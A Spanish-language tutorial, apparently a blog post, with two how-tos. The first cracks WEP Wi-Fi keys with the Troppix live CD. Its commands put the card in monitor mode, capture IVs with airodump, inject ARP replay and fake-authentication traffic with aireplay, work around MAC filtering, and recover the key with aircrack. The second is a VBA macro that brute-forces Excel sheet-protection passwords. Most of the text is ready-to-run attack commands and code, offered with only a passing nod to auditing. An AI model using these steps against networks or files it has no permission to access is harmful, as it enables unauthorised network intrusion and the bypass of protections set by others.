Obteniendo claves WEP con troppix en tarjetas inalambricas intel centrino

Se debe descargar la ultima versión de troppix (la version 1.2 ). Estas tecnicas se basan en poner la tarjeta inalambrica en modo monitor, ahora esto en windows es casi imposible de hacer debido a que no se dispone de los driver apropiados, pero en linux es bastante facil, de hecho troppix es una pequeña distribución linux, que esta especialmente diseñada para la auditoria wirelles, de hecho se debe usar solo para chequear la seguridad de las redes inalambricas.

Arrancamos la maquina desde CD con troppix, y luego en modo consola ponemos ( de hecho es lo primero que aparece):

1.- Uso del airodump y el aircrack:

rmmod ipw2200
echo 100 > /sys/class/firmware/timeout
modprobe ipw2200

Luego ponemos:

iwconfig
esto nos da el nombre de la tarjeta (eth0, ath0, etc).

Nuestra tarjeta es la única que al lado no pone “No wireless extensions”

Código:

airmon.sh start ath0

y ahora entramos en el airodump.

Código:

airodump ath0 pruebas 0 1

donde ath0 es la tarjeta, pruebas es el archivo donde se guardan las capturas ,0 es el canal( al escribir 0 indicamos que busque en todos) y 1 indica que sólo se guarden los IVs, para ahorrar espacio en disco o en memoria.

Miramos cual es el nombre de la red que queremos buscar la WEP y apuntamos el Channel y el ESSID( nombre de la red), en este manual pongamos que es el 6 y el ESSID “Uxio”.

Entonces pulsamos Control+Z y escribimos

Código:

iwconfig ath0 mode monitor channel 6 essid Uxio

Código:

airmon.sh start ath0 6

Código:

airodump ath0 pruebas 6 1

Bien, entonces así ya estaría. esperamos a que el DATA aumente y cuando llegue a más de 250.000 abrimos otra ventana de comandos (hacemos click en el monitor de abajo) y escribimos

Código:

aircrack pruebas*.ivs

Con un poco de suerte debería aparecer la clave aunque a veces se pueden llegar a necesitar hasta 4 millones de IVs (DATA)

2.- Acelerar el proceso cuando hay alguien conectado.

Los DATA suben muy lentos. Para que suban más rápido debemos usar aireplay. Miramos los datos que aparecen en la lista de abajo y cubrimos aquí los datos. Miramos que el BSSID coincida con el de nuestra red. Si hay varios, sirve cualquiera. Para escribir esto abrimos otra ventana.

Código:

aireplay -3 ath0 -b BSSID -h STATION

3.- Hacer que haya proceso o acelerarlo cuando no hay “Station” (Cliente), es decir, nadie conectado.

A veces ni siquiera van a subir los DATA ni vamos a tener nada en la lista de abajo que tenga que ver con nuestra red. Esto se soluciona de la siguiente manera. Primero abrimos otra ventana y luego ponemos:

Código:

aireplay -1 30 ath0 -e ESSID -a BSSID -h 00:11:22:33:44:55

Si al final de este comando nos pone association successful lo hemos hecho bien, pero esa ventana no la cerramos porque va a seguir enviando datos cada 30 segundos. Si nos da algún problema escribimos:

Código:

iwconfig ath0 rate 1M essid ESSID

Los problemas pueden ser debidos a:

• El AP está muy lejos
• El AP está protegido contra este ataque (no hay solución)
• Los drivers no están parcheados para la reinyección, pero si estan usando Troppix no se preocupen por esto porque ya vienen instalados por defecto
• Filtrado MAC. Nos pondrá algo así “AP rejects MAC”. Para solucionarlo tendremos que coneguir la MAC de un cliente, así que mejor dejamos que se conecte y hacemos el paso 5 directamente.

y luego lo de antes.

Código:

aireplay -1 30 ath0 -e ESSID -a BSSID -h 00:11:22:33:44:55

Bien, después de association succesful abrimos una nueva ventana de comandos y escribimos

Código:

aireplay -3 ath0 -b BSSID -h 00:11:22:33:44:55 -x 300

Si sale bien veremos que cuando lleve cierto número de READ empezarán a aumentar ARP y SENT. Además en el airodump veremos que los DATA empiezan a subir.

Después de todo esto tenemos que ejecutar el aircrack como ya dije antes para averiguar la clave.

Como curiosidad (y salvación para algunos), las redes que son del estilo “PACO 27″, sin barra (_), en aireplay quedarían así

Código:

-e PACO\ 27.

Desproteger hojas de calculo en excel

Aqui les pongo una rutina que funciona para reventar claves de bloqueo en excel, de hecho la clave que consigue no es la original pero funciona:

Sub breakit()

 Dim i As Integer, j As Integer, k As Integer
 Dim l As Integer, m As Integer, n As Integer

   On Error Resume Next
   For i = 65 To 66
    For j = 65 To 66
     For k = 65 To 66
      For l = 65 To 66
       For m = 65 To 66
        For i1 = 65 To 66
         For i2 = 65 To 66
          For i3 = 65 To 66
           For i4 = 65 To 66
            For i5 = 65 To 66
             For i6 = 65 To 66
              For n = 32 To 126

   ActiveSheet.Unprotect Chr(i) & Chr(j) & Chr(k) & _
    Chr(l) & Chr(m) & Chr(i1) & Chr(i2) & Chr(i3) & _
    Chr(i4) & Chr(i5) & Chr(i6) & Chr(n)

   If ActiveSheet.ProtectContents = False Then
    MsgBox "One usable password is " & Chr(i) & Chr(j) & _
       Chr(k) & Chr(l) & Chr(m) & Chr(i1) & Chr(i2) & Chr(i3) _
       & Chr(i4) & Chr(i5) & Chr(i6) & Chr(n)
    Exit Sub
 End If
             Next
            Next
           Next
          Next
         Next
        Next
       Next
      Next
     Next
    Next
   Next
  Next

End Sub

Copiar esta rutina en un módulo del mismo libro y ejecutarla. Eso es todo.